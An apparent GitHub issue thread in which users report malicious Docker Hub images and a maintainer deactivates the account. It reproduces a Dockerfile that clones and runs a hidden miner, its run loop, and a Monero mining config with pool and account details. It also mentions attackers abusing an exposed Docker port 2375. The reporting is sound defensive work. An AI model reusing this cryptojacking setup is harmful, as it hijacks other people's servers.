jmwong
commented
6 years ago Thanks for the report @fernandodebrando. Could you elaborate on those images? Have you seen it being used in an attack?
Closed fernandodebrando closed 6 years ago
jmwong
commented
6 years ago Thanks for the report @fernandodebrando. Could you elaborate on those images? Have you seen it being used in an attack?
fernandodebrando
commented
6 years ago I recently found on a server a container with this image l0s3r/m3n
FROM phusion/baseimage:latest
LABEL maintainer=ziw
RUN apt-get -y update && \
DEBIAN_FRONTEND=noninteractive apt-get install -y \
wget \
xz-utils \
git \
curl \
zip && \
rm -rf /var/lib/apt/lists/*
WORKDIR /tmp
RUN git clone https://github.com/l0se3/runandrun.git
WORKDIR /tmp/runandrun
RUN unzip var.zip
RUN chmod +x *
RUN chmod +x run.shRun container
$ docker run -it --network=none l0s3r/m3n /bin/bash
Contents of the files
run.sh
#!/bin/sh
while :
do
echo "Press [CTRL+C] to stop.."
./nodjs -c config.json
doneconfig.json
{
"algo": "cryptonight", // cryptonight (default) or cryptonight-lite
"av": 0, // algorithm variation, 0 auto select
"background": false, // true to run the miner in the background
"colors": true, // false to disable colored output
"cpu-affinity": null, // set process affinity to CPU core(s), mask "0x3" for cores 0 and 1
"cpu-priority": null, // set process priority (0 idle, 2 normal to 5 highest)
"donate-level": 0, // donate level, mininum 1%
"log-file": null, // log all output to a file, example: "c:/some/path/xmrig.log"
"max-cpu-usage": 95, // maximum CPU usage for automatic mode, usually limiting factor is CPU cache not this option.
"print-time": 60, // print hashrate report every N seconds
"retries": 5, // number of times to retry before switch to backup server
"retry-pause": 5, // time to pause between retries
"safe": false, // true to safe adjust threads and av settings for current CPU
"syslog": false, // use system log for output messages
"threads": 0, // number of miner threads
"pools": [
{
"url": "xmr.pool.minergate.com:45700", // URL of mining server
"user": "sam05@protonmail.com", // username for mining server
"pass": "x", // password for mining server
"keepalive": true, // send keepalived for prevent timeout (need pool support)
"nicehash": false, // enable nicehash/xmrig-proxy support
"variant": -1 // algorithm PoW variant
}
],
"api": {
"port": 0, // port for the miner API https://github.com/xmrig/xmrig/wiki/API
"access-token": null, // access token for API
"worker-id": null // custom worker-id for API
}
}Thanks for your report. We've deactivated the user.
fangbo947705
commented
6 years ago Malicious image found in the account https://hub.docker.com/r/l0se3/dah/ in the docker hub. please help, the same as @fernandodebrando feedback
fernandodebrando
commented
6 years ago @fangbo947705 , have you seen it being used in an attack? Also report the account on github https://github.com/l0se3x.
fangbo947705
commented
6 years ago yes,it run on our server.when I remove it ,it will come later.I have find the result ,I have expose 2375 port to the internet,then he can use this port to control my docker service.now I forbidden this port
Malicious image found in the account https://hub.docker.com/r/l0s3r in the docker hub.